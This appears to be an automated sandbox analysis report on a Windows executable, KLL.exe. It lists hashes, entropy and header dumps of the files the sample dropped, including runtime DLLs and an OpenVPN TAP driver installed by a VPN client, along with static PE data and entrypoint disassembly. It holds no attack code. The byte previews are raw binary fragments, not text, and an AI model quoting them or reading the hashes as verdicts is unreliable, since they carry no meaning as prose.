Preview:	.wp.0.(...'..U!.[."1$D'./d %.=LE.C.X.g.V.t.......4.>.U.....e.mM~5..W.:....&p._.R.T..v..v...bM..b.;..!.P.m.?..\|kU...zdU...h..........].)..z;.^L.n^..5rP...c.....j..Z..3Z..7.O.8s.......'".A.....N..Q6.G.ww...f.....w...D...{....j,..L..S.r#.... ..}...p.m.g}...ma5.F.S$e.um...u&....2Z..y...1v(x3..b..^t3s.^xU......J...O.%26RayV...7^W..al...U...(.s<m....B.....c..E....1......=...i9.y.+.R.lA.._#`..{.!....!8`.%.,..5g.0..z...k...+\;_......`..5.C~.Q.m#($r...G.+......?FO....\.L..s..)...Z....@.<......f..?..T".4.....jb.2....H..#..I.=..w..f...W>..,.........M,...@\....p;Cw.w...{Y....(......V.......K\|...(......K..d..V.?4.E.....j.....C....Jt....Z.R....v#......\s7.... ......{...>....+.....{F`...qY.3...j.J..b:... ....Xf..w.........n.=.YA.}.5..,...j..V...".E"i...ga....&ay....`..,/'{ .$..\.l.~i.b.H..Zra..[......i..OQ..n..0..j.R+V..m..e..S.8.an.G...y..,../....$........ZE\.24xo..j......_!l.......c;....xw5.;I.I..X^3....w-.dU<.WP.e<.MC.tn.s.......b.V2...f.k-a.?...

C:\Users\user\Videos\A2A20C2D~m8\msvcp140.dll

Download File

Process:	C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	439608
Entropy (8bit):	6.652249319015373
Encrypted:	false
SSDEEP:	12288:oAoA7hbarg71r4RzfxjJhUgiW6QR7t5s03Ooc8dHkC2esq0Ju:oAoAN3r0Bm03Ooc8dHkC2eT0Ju
MD5:	1D8C79F293CA86E8857149FB4EFE4452
SHA1:	7474E7A5CB9C79C4B99FDF9FB50EF3011BEF7E8F
SHA-256:	C09B126E7D4C1E6EFB3FFCDA2358252CE37383572C78E56CA97497A7F7C793E4
SHA-512:	83C4D842D4B07BA5CEC559B6CD1C22AB8201941A667E7B173C405D2FC8862F7E5D9703E14BD7A1BABD75165C30E1A2C95F9D1648F318340EA5E2B145D54919B1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U.C.4...4...4..t.I..4...L...4..Lm...4...4...4..Lm...4..Lm...4..Lm...4..Lm...4..Lm...4..Lm}..4..Lm...4..Rich.4..........................PE..L.....U.........."!................ ........ ...........................................@A.........................A.......R..,....................v..8?.......:..0g..8............................)..@............P......P>..@....................text..."........................... ..`.data....'... ......................@....idata..2....P......................@..@.didat..4....p.......4..............@....rsrc................6..............@..@.reloc...:.......<...:..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\Videos\A2A20C2D~m8\uc_guilib.dll

Download File

Process:	C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2798592
Entropy (8bit):	6.785357408096823
Encrypted:	false
SSDEEP:	49152:Cy2L/kje8OFJG+yk87AGuWl4vZ8EsHv1dL//e7qJ5pv:92jkje8KM+ykyAGuWl4h5sHv1N/
MD5:	222FC00C04823BAAEF6EA2406082DB6E
SHA1:	B4042DAFBD8DED61C64C8ED69B8DC06710950A01
SHA-256:	90BA55338412BFF084A981F67DA7FF07333C339C1965CFA23832442532247C50
SHA-512:	65C99E567C9BE76C94553DE46DE5F7B6C079630921A063897DC8C4EA0D7C2EC34634A2004F5C10135AD18A38BDB35E92CF3161638B3855E2C9D2216B3EE74877
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,.K.M...M...M..5....M..5...$M..5....M...5d..M...5c..M...5s..M...M..~O..,....M..,....M..,....L..4....M..4....M..4....M...Mw..M..4....M..Rich.M..........PE..L....C.f...........!.........F......\........0................................,...........@...........................#.....L.%.@......H1...................@.d\|...C!.8...................tD!......D!.@............0..P............................text............................... ..`.rdata.......0......."..............@..@.data........ &..T....&.............@....gfids..h....0(......^&.............@..@.giats........).......(.............@..@.tls..........).......(.............@....rsrc...H1......2....(.............@..@.reloc..d\|...@..~...6(.............@..B........................................................................................................................................................

C:\Users\user\Videos\A2A20C2D~m8\vcruntime140.dll

Download File

Process:	C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	85328
Entropy (8bit):	6.8770791315221285
Encrypted:	false
SSDEEP:	1536:BTXU4YQD+JZoxeu8zIrBj3hGzHRb3izsQe1o8jsu0gD/TecbOjc8WsaBmiK:pXUlQDeexZTBozHRb3izsQe1o8E8ecbg
MD5:	B77EEAEAF5F8493189B89852F3A7A712
SHA1:	C40CF51C2EADB070A570B969B0525DC3FB684339
SHA-256:	B7C13F8519340257BA6AE3129AFCE961F137E394DDE3E4E41971B9F912355F5E
SHA-512:	A09A1B60C9605969A30F99D3F6215D4BF923759B4057BA0A5375559234F17D47555A84268E340FFC9AD07E03D11F40DD1F3FB5DA108D11EB7F7933B7D87F2DE3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^$Y..E7W.E7W.E7W..W.E7W.=.W.E7W.E6W3E7W..3V.E7W..4V.E7W..2V.E7W..?V.E7W..7V.E7W...W.E7W..5V.E7WRich.E7W........................PE..L.....U.........."!......... ...............................................P......r.....@A........................`................0..................P?...@....... ..8...........................X ..@............................................text...t........................... ..`.data...............................@....idata..............................@..@_RDATA....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................

C:\Windows\INF\oem4.inf

Download File

Process:	C:\Windows\System32\drvinst.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	7632
Entropy (8bit):	5.063558190257152
Encrypted:	false
SSDEEP:	192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
MD5:	26009F092BA352C1A64322268B47E0E3
SHA1:	E1B2220CD8DCAEF6F7411A527705BD90A5922099
SHA-256:	150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
SHA-512:	C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
Malicious:	false
Preview:	; ***************************************************************************..; Copyright (C) 2002-2014 OpenVPN Technologies, Inc. ..; This program is free software; you can redistribute it and/or modify ..; it under the terms of the GNU General Public License version 2 ..; as published by the Free Software Foundation. ..; *************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*******************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try

C:\Windows\INF\setupapi.dev.log

Download File

Process:	C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
File Type:	Generic INItialization configuration [BeginLog]
Category:	dropped
Size (bytes):	58530
Entropy (8bit):	5.20453883629185
Encrypted:	false
SSDEEP:	384:OGdni80C/8g0atRf7yr14ujuNY9AZi3Z/oUtwrzUQ5SE2e3WKeC49p6Zi82+jm:Own95cdyYloiwnlz2eKC49P+y
MD5:	43E07AA474D66317D20826F68AB3690F
SHA1:	6B810FE01BA6AA9D0BC5792669F182F710A5D42A
SHA-256:	9EDD5D23DBA5BF41D91D7819876964F4E3B2A38112D33E3F00849A716753EF97
SHA-512:	DA44572DCAC43E03A256B7BCC29B133AFF6C25B52088E102E26C2F4B6D51C73C5547FC1C6703A64475B21E31060BF933F87992FBDD79DFB94711242F2C727AAA
Malicious:	false
Preview:	[Device Install Log].. OS Version = 10.0.19045.. Service Pack = 0.0.. Suite = 0x0100.. ProductType = 1.. Architecture = amd64....[BeginLog]....[Boot Session: 2023/10/03 09:57:02.288]....>>> [Setup Import Driver Package - C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf]..>>> Section start 2023/10/03 09:57:37.904.. cmd: C:\Windows\System32\spoolsv.exe.. inf: Provider: Microsoft.. inf: Class GUID: {4D36E979-E325-11CE-BFC1-08002BE10318}.. inf: Driver Version: 06/21/2006,10.0.19041.1806.. inf: Catalog File: prnms009.cat.. ump: Import flags: 0x0000000D.. pol: {Driver package policy check} 09:57:37.920.. pol: {Driver package policy check - exit(0x00000000)} 09:57:37.920.. sto: {Stage Driver Package: C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf} 09:57:37.920.. inf: {Query Configurability: C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf} 09:57:37.920.. inf:

C:\Windows\Logs\NetSetup\service.0.etl

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	589824
Entropy (8bit):	0.38533523232512973
Encrypted:	false
SSDEEP:	192:/LZm8DmT1xMS92sICkjd0x5AUko5HOLboAcKYzFlgbmDdTxvIvLNawMK:/LvM7mjhRoZO/oAPbDz
MD5:	3DCC188696A49B40E2DFED7853BDD9B0
SHA1:	0348517B1B11F61257AF3D2C0A9BE39A51195C84
SHA-256:	260865F2C6C9BE08F9794BFDA0F34E23377AA24509E556DABA4D7C1265782B6A
SHA-512:	DF8D7C3F2FC3F098AA6A92B0357EBEA09D37A543EC41F83E9D12E26D142D4955BC9A51AE5AD577B49C3CC892CF1100E47E2B9A3026CFBE84DC325D5EB0B00447
Malicious:	false
Preview:	....8...8.......................................P...!....................................?......................eJ......}a......Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.6.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.6.1...........................................................@K5..............?..............N.e.t.C.f.g.T.r.a.c.e...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.N.e.t.S.e.t.u.p.\.s.e.r.v.i.c.e...0...e.t.l.........P.P..........?..................................................................8.B..?......19041.1.amd64fre.vb_release.191206-1406.....5.@..?.........gP.......U..l....NetSetupShim.pdb.b......7.@..?.......I.[.8+m.!N8$......NetSetupuser.pdb......4.@..?.........>*.....Nr8..a....NetSetupApi.pdb.........4.@..?.........E_iC...F........NetSetupSvc.pdb.............................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\System32\DriverStore\Temp\{5b26b4ea-b6dc-c74d-9d3f-4a81e79191a8}\SETC52A.tmp

Download File

Process:	C:\Windows\System32\drvinst.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	7632
Entropy (8bit):	5.063558190257152
Encrypted:	false
SSDEEP:	192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
MD5:	26009F092BA352C1A64322268B47E0E3
SHA1:	E1B2220CD8DCAEF6F7411A527705BD90A5922099
SHA-256:	150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
SHA-512:	C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
Malicious:	false
Preview:	; ***************************************************************************..; Copyright (C) 2002-2014 OpenVPN Technologies, Inc. ..; This program is free software; you can redistribute it and/or modify ..; it under the terms of the GNU General Public License version 2 ..; as published by the Free Software Foundation. ..; *************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*******************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try

C:\Windows\System32\DriverStore\Temp\{5b26b4ea-b6dc-c74d-9d3f-4a81e79191a8}\SETC53A.tmp

Download File

Process:	C:\Windows\System32\drvinst.exe
File Type:	data
Category:	dropped
Size (bytes):	10739
Entropy (8bit):	7.214364446291792
Encrypted:	false
SSDEEP:	192:JDVLGVDFfap5UEwQl/WGhYCt17vJ4qnaj6jQc:7GCpzlnh3t1x4l2jn
MD5:	F73AC62E8DF97FAF3FC8D83E7F71BF3F
SHA1:	619A6E8F7A9803A4C71F73060649903606BEAF4E
SHA-256:	CC74CDB88C198EB00AEF4CAA20BF1FDA9256917713A916E6B94435CD4DCB7F7B
SHA-512:	F81F5757E0E449AD66A632299BCBE268ED02DF61333A304DCCAFB76B2AD26BAF1A09E7F837762EE4780AFB47D90A09BF07CB5B8B519C6FB231B54FA4FBE17FFE
Malicious:	false
Preview:	0.)....H........).0.)....1.0...`.H.e......0..i..+.....7.....Z0..V0...+.....7.......r?.X.M.....F.A..201008141946Z0...+.....7.....0..T0.... .....S!F.3....#.a.2`..e...#e...1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .....S!F.3....#.a.2`..e...#e...0...."~..m..8C. i$.4.l..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0.... ..j(.M<.cR..XrT....F..R.]....?1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ..j(.M<.cR..XrT....F..R.]....?0.....".....A.Rw..... .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f.......0...0....+.

C:\Windows\System32\DriverStore\Temp\{5b26b4ea-b6dc-c74d-9d3f-4a81e79191a8}\SETC54B.tmp

Download File

Process:	C:\Windows\System32\drvinst.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	39920
Entropy (8bit):	6.338128217115975
Encrypted:	false
SSDEEP:	768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
MD5:	C10CCDEC5D7AF458E726A51BB3CDC732
SHA1:	0553AAB8C2106ABB4120353360D747B0A2B4C94F
SHA-256:	589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
SHA-512:	7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~..[...[...[....w..Z....w..^...[...m....w.._....w..^.../t..Q.../t..Z.../t..Z...Rich[...........................PE..d......_.........."......Z.....................@....................................=w....`A....................................................<.......X....p..T....x...#...........R..8............................S...............P...............................text..._>.......@.................. ..h.rdata.......P.......D..............@..H.data........`.......P..............@....pdata..T....p.......R..............@..HPAGE.................V.............. ..`INIT.................d.............. ..b.rsrc...X............p..............@..B.reloc...............v..............@..B................................................................................................................................................................................

C:\Windows\System32\DriverStore\Temp\{5b26b4ea-b6dc-c74d-9d3f-4a81e79191a8}\oemvista.inf (copy)

Download File

Process:	C:\Windows\System32\drvinst.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	7632
Entropy (8bit):	5.063558190257152
Encrypted:	false
SSDEEP:	192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
MD5:	26009F092BA352C1A64322268B47E0E3
SHA1:	E1B2220CD8DCAEF6F7411A527705BD90A5922099
SHA-256:	150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
SHA-512:	C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
Malicious:	false
Preview:	; ***************************************************************************..; Copyright (C) 2002-2014 OpenVPN Technologies, Inc. ..; This program is free software; you can redistribute it and/or modify ..; it under the terms of the GNU General Public License version 2 ..; as published by the Free Software Foundation. ..; *************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*******************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try

C:\Windows\System32\DriverStore\Temp\{5b26b4ea-b6dc-c74d-9d3f-4a81e79191a8}\tap0901.cat (copy)

Download File

Process:	C:\Windows\System32\drvinst.exe
File Type:	data
Category:	dropped
Size (bytes):	10739
Entropy (8bit):	7.214364446291792
Encrypted:	false
SSDEEP:	192:JDVLGVDFfap5UEwQl/WGhYCt17vJ4qnaj6jQc:7GCpzlnh3t1x4l2jn
MD5:	F73AC62E8DF97FAF3FC8D83E7F71BF3F
SHA1:	619A6E8F7A9803A4C71F73060649903606BEAF4E
SHA-256:	CC74CDB88C198EB00AEF4CAA20BF1FDA9256917713A916E6B94435CD4DCB7F7B
SHA-512:	F81F5757E0E449AD66A632299BCBE268ED02DF61333A304DCCAFB76B2AD26BAF1A09E7F837762EE4780AFB47D90A09BF07CB5B8B519C6FB231B54FA4FBE17FFE
Malicious:	false
Preview:	0.)....H........).0.)....1.0...`.H.e......0..i..+.....7.....Z0..V0...+.....7.......r?.X.M.....F.A..201008141946Z0...+.....7.....0..T0.... .....S!F.3....#.a.2`..e...#e...1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .....S!F.3....#.a.2`..e...#e...0...."~..m..8C. i$.4.l..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0.... ..j(.M<.cR..XrT....F..R.]....?1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ..j(.M<.cR..XrT....F..R.]....?0.....".....A.Rw..... .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f.......0...0....+.

C:\Windows\System32\DriverStore\Temp\{5b26b4ea-b6dc-c74d-9d3f-4a81e79191a8}\tap0901.sys (copy)

Download File

Process:	C:\Windows\System32\drvinst.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	39920
Entropy (8bit):	6.338128217115975
Encrypted:	false
SSDEEP:	768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
MD5:	C10CCDEC5D7AF458E726A51BB3CDC732
SHA1:	0553AAB8C2106ABB4120353360D747B0A2B4C94F
SHA-256:	589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
SHA-512:	7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~..[...[...[....w..Z....w..^...[...m....w.._....w..^.../t..Q.../t..Z.../t..Z...Rich[...........................PE..d......_.........."......Z.....................@....................................=w....`A....................................................<.......X....p..T....x...#...........R..8............................S...............P...............................text..._>.......@.................. ..h.rdata.......P.......D..............@..H.data........`.......P..............@....pdata..T....p.......R..............@..HPAGE.................V.............. ..`INIT.................d.............. ..b.rsrc...X............p..............@..B.reloc...............v..............@..B................................................................................................................................................................................

C:\Windows\System32\catroot2\dberr.txt

Download File

Process:	C:\Windows\System32\drvinst.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	3473
Entropy (8bit):	5.3657190605459375
Encrypted:	false
SSDEEP:	96:QO00eO00erMwUgWUg0B1kE3ZhpJp8ZpkRepk3s5pmspmZH:QO00eO00erMwmkB1kAl
MD5:	D2177BEA1164E00698F33F048E2C46AC
SHA1:	F1A1D4A87F29D67E344FD01474F9DE4C972F8314
SHA-256:	96ABA9BB9DD770623D97F3DAE10873F05E9CEF688D3E0C3293ECEFE41737C061
SHA-512:	D2D1245E408CEB7759F1E4B50BE07C9B70F13560C0D540559477EE3D403DC1DB9C98AAFD3564FB74142AC69043709E7D00640EED262FEDE8809A34BC9CBDC735
Malicious:	false
Preview:	CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6041 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6699 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #4398 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6041 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6699 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #4398 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #2083 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #2459 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: SyncAllDBs Corruption or Schema Change..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #891 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #1307 encountered JET error -1601..CatalogDB: 08:57:12 03/10/2023: SyncDB:: Sync sta

C:\Windows\System32\drivers\SETCB25.tmp

Download File

Process:	C:\Windows\System32\drvinst.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	39920
Entropy (8bit):	6.338128217115975
Encrypted:	false
SSDEEP:	768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
MD5:	C10CCDEC5D7AF458E726A51BB3CDC732
SHA1:	0553AAB8C2106ABB4120353360D747B0A2B4C94F
SHA-256:	589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
SHA-512:	7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~..[...[...[....w..Z....w..^...[...m....w.._....w..^.../t..Q.../t..Z.../t..Z...Rich[...........................PE..d......_.........."......Z.....................@....................................=w....`A....................................................<.......X....p..T....x...#...........R..8............................S...............P...............................text..._>.......@.................. ..h.rdata.......P.......D..............@..H.data........`.......P..............@....pdata..T....p.......R..............@..HPAGE.................V.............. ..`INIT.................d.............. ..b.rsrc...X............p..............@..B.reloc...............v..............@..B................................................................................................................................................................................

C:\Windows\System32\drivers\tap0901.sys (copy)

Download File

Process:	C:\Windows\System32\drvinst.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	39920
Entropy (8bit):	6.338128217115975
Encrypted:	false
SSDEEP:	768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
MD5:	C10CCDEC5D7AF458E726A51BB3CDC732
SHA1:	0553AAB8C2106ABB4120353360D747B0A2B4C94F
SHA-256:	589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
SHA-512:	7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~..[...[...[....w..Z....w..^...[...m....w.._....w..^.../t..Q.../t..Z.../t..Z...Rich[...........................PE..d......_.........."......Z.....................@....................................=w....`A....................................................<.......X....p..T....x...#...........R..8............................S...............P...............................text..._>.......@.................. ..h.rdata.......P.......D..............@..H.data........`.......P..............@....pdata..T....p.......R..............@..HPAGE.................V.............. ..`INIT.................d.............. ..b.rsrc...X............p..............@..B.reloc...............v..............@..B................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.555454795666252
TrID:	Win64 Executable GUI (202006/5) 60.38% Windows ActiveX control (116523/4) 34.83% Win64 Executable (generic) (12005/4) 3.59% Generic Win/DOS Executable (2004/3) 0.60% DOS Executable Generic (2002/1) 0.60%
File name:	KLL.exe
File size:	32'259'584 bytes
MD5:	5ffebaab4f8218b7abff3a8258dbf316
SHA1:	0808b7cc585e310e5576ad1a44eb37b963d952ef
SHA256:	f0795ab570128f9924611a8955e964a2121aac61135701cbdd38664ca746b1d4
SHA512:	f84ee2213efd183b4d4c4e5155d232ec4880471d99d0a117c541ced9fefca25fe47820522c86a1747c035e20ae1ee3be3c0d855f4d8b932d31843e9ac2e1c14a
SSDEEP:	393216:STldovMZL9ZJANAAAdJJ1AboWROo2Q3d2sMNJ+Hmasukzz34qxuHkZmyTtvkJJhe:KpeOJJ1AtROo1YsM6Hmad+o/S
TLSH:	CD67D08BB76541D1D16FC179C9469A4FD7B270144B22DBCF01A8CB9A2F236E21E7E312
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......%2.GaS..aS..aS....-.nS..../..S......wS..h+_.lS..h+X.`S..h+[.cS..h+O.FS..aS..>P......wS......kS.......R......hS....#.`S..aSK.`S.

File Icon


Icon Hash:	13adccdae6642d93

Static PE Info

General

Entrypoint:	0x14029a648
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x669951CF [Thu Jul 18 17:33:03 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	c97702b2ade29d70dc110536ed951598

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F5D70F2993Ch
dec eax
add esp, 28h
jmp 00007F5D70F28DBBh
int3
int3
dec eax
jmp dword ptr [0008052Dh]
int3
dec eax
mov eax, esp
dec eax
mov dword ptr [eax+08h], ebx
dec eax
mov dword ptr [eax+10h], ebp
dec eax
mov dword ptr [eax+18h], esi
dec eax
mov dword ptr [eax+20h], edi
inc ecx
push esi
dec eax
sub esp, 20h
dec ebp
mov edx, dword ptr [ecx+38h]
dec eax
mov esi, edx
dec ebp
mov esi, eax
dec eax
mov ebp, ecx
dec ecx
mov edx, ecx
dec eax
mov ecx, esi
dec ecx
mov edi, ecx
inc ecx
mov ebx, dword ptr [edx]
dec eax
shl ebx, 04h
dec ecx
add ebx, edx
dec esp
lea eax, dword ptr [ebx+04h]
call 00007F5D70F282B3h
mov eax, dword ptr [ebp+04h]
and al, 66h
neg al
mov eax, 00000001h
sbb edx, edx
neg edx
add edx, eax
test dword ptr [ebx+04h], edx
je 00007F5D70F28F83h
dec esp
mov ecx, edi
dec ebp
mov eax, esi
dec eax
mov edx, esi
dec eax
mov ecx, ebp
call 00007F5D70F2CD2Fh
dec eax
mov ebx, dword ptr [esp+30h]
dec eax
mov ebp, dword ptr [esp+38h]
dec eax
mov esi, dword ptr [esp+40h]
dec eax
mov edi, dword ptr [esp+48h]
dec eax
add esp, 20h
inc ecx
pop esi
ret
int3
int3
int3
int3
int3
int3
int3
dec eax
mov eax, esp
dec esp
mov dword ptr [eax+20h], ecx
